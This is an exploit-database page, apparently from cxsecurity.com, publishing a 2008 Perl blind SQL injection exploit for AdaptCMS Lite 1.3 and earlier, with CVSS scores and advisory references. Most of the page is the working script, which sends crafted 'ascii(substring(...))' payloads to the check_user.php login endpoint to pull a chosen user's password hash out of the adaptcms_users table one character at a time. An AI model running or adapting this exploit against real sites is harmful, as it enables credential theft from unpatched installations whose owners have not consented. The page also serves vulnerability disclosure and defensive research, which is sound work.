AdaptCMS Lite <= 1.3 Blind SQL Injection Exploit

2008.10.10
Credit: StAkeR
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl # ----------------------------------------------------- # AdaptCMS Lite <= 1.3 Blind SQL Injection Exploit # Discovered By StAkeR - StAkeR[at]hotmail[dot]it # Discovered On 03/10/2008 # ----------------------------------------------------- # Download http://www.insanevisions.com/page/downloads # ----------------------------------------------------- use strict; use LWP::UserAgent; my ($hash,$send,$sub) = (undef,undef,1); my ($host,$uid) = @ARGV; usage() unless $host =~ /^http:\/\/(.+?)$/i and $uid =~ /^[0-9]$/; sub send_request { my $param = shift @_; my $http = new LWP::UserAgent; my $post = $http->post($host.'/includes/check_user.php',[ user_name => $param ]); if($post->is_success) { return 38 unless $post->content =~ /yes/i; } } my @chars = (48..57, 97..102); for(0..32) { foreach my $set(@chars) { $send = "' or ascii(substring((select password". " from adaptcms_users where id=$uid),$sub,1))=$set#"; if(send_request($send) > 1) { $hash .= chr($set); $sub++; last; } } } sub usage { print "[?] AdaptCMS Lite <= 1.3 Blind SQL Injection Exploit\n"; print "[?] Usage: perl $0 http://[host] [user id]\n"; exit; } if(defined $hash) { print "[?] Hash: $hash\n"; exit; } else { print "[?] Exploit Failed!\n"; exit; }

References:

http://www.adaptcms.com/article/51/News/URGENT-AdaptCMS-13-Security-Fix-Released/
http://secunia.com/advisories/32171
http://xforce.iss.net/xforce/xfdb/45642
http://www.securityfocus.com/bid/31557
http://www.milw0rm.com/exploits/6662


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top